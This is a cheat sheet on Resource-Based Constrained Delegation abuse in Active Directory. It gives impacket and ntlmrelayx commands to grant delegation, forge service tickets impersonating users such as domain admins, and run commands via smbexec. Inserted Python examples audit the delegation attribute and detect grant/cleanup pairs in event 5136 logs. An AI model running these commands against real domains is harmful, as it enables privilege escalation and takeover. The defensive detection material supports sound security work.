
Resource-Based Constrained Delegation (RBCD)

Set msDS-AllowedToActOnBehalfOfOtherIdentity on the target service's AD object (DC$, etc.) to include an SPN-bearing principal you control (MACHINE$). With write access to that attribute, you can obtain Kerberos service tickets as arbitrary users to any SPN registered on the target account.
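From the defender's side, the attribute described above is the thing to audit: it stores a self-relative NT security descriptor, and every ACCESS_ALLOWED ACE in its DACL names a principal that may act on behalf of other identities toward that object. The following is an added example (not code from the original page or from impacket) that decodes the descriptor, lists those SIDs, and flags any computer object granting the right to a principal that is not on an approved list. The descriptor bytes, domain SID, computer names and approved list are constructed sample data; in practice the attribute value is read from each computer object over LDAP.

```python
"""List who may act on behalf of other identities to a computer object (added example, not from the page)."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL_MASK = 0x000F01FF  # mask used in the constructed sample ACEs


def sid_from_bytes(buf: bytes) -> tuple[str, int]:
    """Decode a binary SID; return (S-1-... string, number of bytes consumed)."""
    revision, sub_count = buf[0], buf[1]
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * sub_count


def allowed_to_act(descriptor: bytes) -> list[str]:
    """Return the SIDs named by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if len(descriptor) < 20:
        return []  # attribute absent or truncated: nothing to enumerate
    revision, _sbz1, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []  # no DACL present: no ACEs to enumerate
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", descriptor, dacl_off)
    sids, pos = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(descriptor[pos + 8:pos + ace_size])[0])  # SID follows the 4-byte mask
        pos += ace_size
    return sids


def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-1-... string as a binary SID (used only to build constructed test data)."""
    parts = sid.split("-")
    revision, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([revision, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_descriptor(allowed_sids: list[str]) -> bytes:
    """Build a minimal self-relative descriptor with one ACCESS_ALLOWED ACE per SID (constructed test data)."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL_MASK) + sid_b
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def audit(computers: dict[str, bytes], approved: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return (computer, sid) pairs where a SID may act on behalf of others but is not approved for that computer."""
    findings = []
    for sam, descriptor in computers.items():
        for sid in allowed_to_act(descriptor):
            if sid not in approved.get(sam, set()):
                findings.append((sam, sid))
    return findings


# Constructed sample data: one undocumented grant on a DC, one documented front-end -> back-end delegation.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE = {
    "DC01$": build_descriptor([DOMAIN_SID + "-1105"]),
    "WEB01$": build_descriptor([DOMAIN_SID + "-1201"]),
    "FILE01$": b"",  # attribute not set
}
APPROVED = {"WEB01$": {DOMAIN_SID + "-1201"}}

if __name__ == "__main__":
    for sam, sid in audit(SAMPLE, APPROVED):
        print(f"[!] {sam}: {sid} may act on behalf of other identities but is not on the approved list")
```

Only the ACE type and SID are inspected; the access mask is ignored because the presence of the principal in the DACL is what the KDC evaluates for S4U2Proxy. Resolving each SID to an account name and comparing against a change record is the natural next step in a real audit.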

Requirements

  • Machine account credentials
  • An account or relayed LDAP/LDAPS session with WriteDACL/GenericWrite on the TARGET$ computer object
    • Can be a user or a MACHINE$ account. A MACHINE$ account has write access to its own object.
    • The impersonated account must be delegable: not a member of the "Protected Users" group and not marked "Account is sensitive and cannot be delegated".
  • Domain Controller running Windows Server 2012 or later. msDS-AllowedToActOnBehalfOfOtherIdentity did not exist before 2012.

Exploitation

ATTACKER$ = Attacker controlled machine

TARGET$ = Machine to gain access to

1. Set RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity) Privileges on target

impacket
rbcd.py -action write -delegate-to '<TARGET$>' -delegate-from '<ATTACKER$>' -use-ldaps -dc-ip <dc_ip> <domain>/<user>:'<pass>'

The -use-ldaps flag is required if channel binding/signing is enforced on the DC; otherwise it can be omitted.

OR

ntlmrelayx LDAP shell
set_rbcd <TARGET$> <ATTACKER$>

If channel binding/signing is enforced, issue start_tls inside the LDAP shell before set_rbcd.

Verify / troubleshooting

Verify delegation access using impacket
rbcd.py -action read -delegate-to '<TARGET$>' -dc-ip <dc_ip> <domain>/<user>:'<pass>'

2. Obtain TGT and access TARGET$

Obtain TGT for ATTACKER$
getTGT.py <domain>/<ATTACKER$>:'<comp_pass>' -dc-ip <dc_ip>

Output: <ATTACKER$>.ccache

Generate service ticket / S4U to SPN
KRB5CCNAME=<ATTACKER$>.ccache getST.py -spn <SPN_TYPE>/<TARGET_FQDN> -impersonate <USER_TO_IMPERSONATE> <DOMAIN>/<ATTACKER$> -k -no-pass -dc-ip <DC_IP>
Output: <USER_TO_IMPERSONATE>.ccache

USER_TO_IMPERSONATE can be any delegable user. Pick something that makes sense for the service (e.g. a domain admin should have admin access to the DC's LDAP).

Choose which SPN_TYPE based on which service you want to authenticate to.

See Remote Command Execution Tools to see which tools work for each service/SPN type.

The target's FQDN (not its IP address) is required when using -k so that the SPN in the ticket matches the name the tool requests.

3. Use the ticket

Accessing the targeted SPN as the impersonated user
KRB5CCNAME=<USER_TO_IMPERSONATE>.ccache smbexec.py -k -no-pass <DOMAIN>/<USER_TO_IMPERSONATE>@<TARGET_FQDN>

Use the ccache with whichever service / tool is associated with the previously chosen SPN.

4. Cleanup - after you have finished generating tickets.

Remove RBCD access from the ATTACKER$ machine.
rbcd.py -action remove -delegate-to '<TARGET$>' -delegate-from '<ATTACKER$>' -dc-ip <dc_ip> <domain>/<user>:'<pass>'
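Steps 1 and 4 above are a write and a later removal of the same attribute, which is what a defender can key on. When "Audit Directory Service Changes" is enabled and the computer objects' SACLs audit writes, each change produces Windows Security event 5136 ("A directory service object was modified") carrying the attribute name, the operation type (value added or value deleted) and the subject that made the change. The following is an added example (not from the original page) that runs over such records, flags writes to msDS-AllowedToActOnBehalfOfOtherIdentity, and pairs a grant with a removal on the same object within a short window. The event records are constructed sample input using the 5136 EventData field names; the time window and the "Domain Controllers" OU match are assumptions for illustration.

```python
"""Detect RBCD grants and short-lived grant/cleanup pairs in 5136 records (added example, not from the page)."""
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # OperationType codes used by event 5136

# Constructed sample records in the 5136 EventData field layout.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-05-01T10:00:00", "EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=corp,DC=example", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    {"TimeCreated": "2024-05-01T10:00:00", "EventID": 5136, "SubjectUserName": "svc_deploy",
     "ObjectDN": "CN=WEB01,OU=Servers,DC=corp,DC=example", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2024-05-01T10:07:30", "EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=corp,DC=example", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_DELETED},
]


def rbcd_writes(events: list[dict]) -> list[dict]:
    """Keep only 5136 records that touch the RBCD attribute."""
    return [e for e in events if e.get("EventID") == 5136 and e.get("AttributeLDAPDisplayName") == RBCD_ATTR]


def classify(event: dict) -> list[str]:
    """Return the reasons a single RBCD write deserves attention."""
    reasons = []
    if event["OperationType"] == VALUE_ADDED:
        reasons.append("delegation granted")
    if "OU=Domain Controllers" in event["ObjectDN"]:  # assumed OU name for DCs
        reasons.append("target is a domain controller")
    if event["SubjectUserName"].endswith("$"):
        reasons.append("written by a machine account")
    return reasons


def short_lived_grants(events: list[dict], window: timedelta = timedelta(minutes=30)) -> list[tuple[str, str, float]]:
    """Pair each grant with a later removal on the same object inside the window (grant, use, clean up)."""
    writes = rbcd_writes(events)
    adds = [e for e in writes if e["OperationType"] == VALUE_ADDED]
    dels = [e for e in writes if e["OperationType"] == VALUE_DELETED]
    pairs = []
    for a in adds:
        t_add = datetime.fromisoformat(a["TimeCreated"])
        for d in dels:
            delta = datetime.fromisoformat(d["TimeCreated"]) - t_add
            if d["ObjectDN"] == a["ObjectDN"] and timedelta(0) <= delta <= window:
                pairs.append((a["ObjectDN"], a["SubjectUserName"], delta.total_seconds()))
    return pairs


def findings(events: list[dict]) -> list[tuple[str, str, str, list[str]]]:
    """Summarise every RBCD write as (time, object, subject, reasons)."""
    return [(e["TimeCreated"], e["ObjectDN"], e["SubjectUserName"], classify(e)) for e in rbcd_writes(events)]


if __name__ == "__main__":
    for when, dn, who, why in findings(SAMPLE_EVENTS):
        print(f"{when} {who} -> {dn}: {', '.join(why) or 'delegation removed'}")
    for dn, who, secs in short_lived_grants(SAMPLE_EVENTS):
        print(f"[!] {who} granted and removed RBCD on {dn} within {secs:.0f}s")
```

A removal is not evidence that nothing happened: tickets obtained in step 2 remain valid for their lifetime after step 4, so the add/remove pair should be correlated with service-ticket requests for the object in the same window rather than closed out on its own.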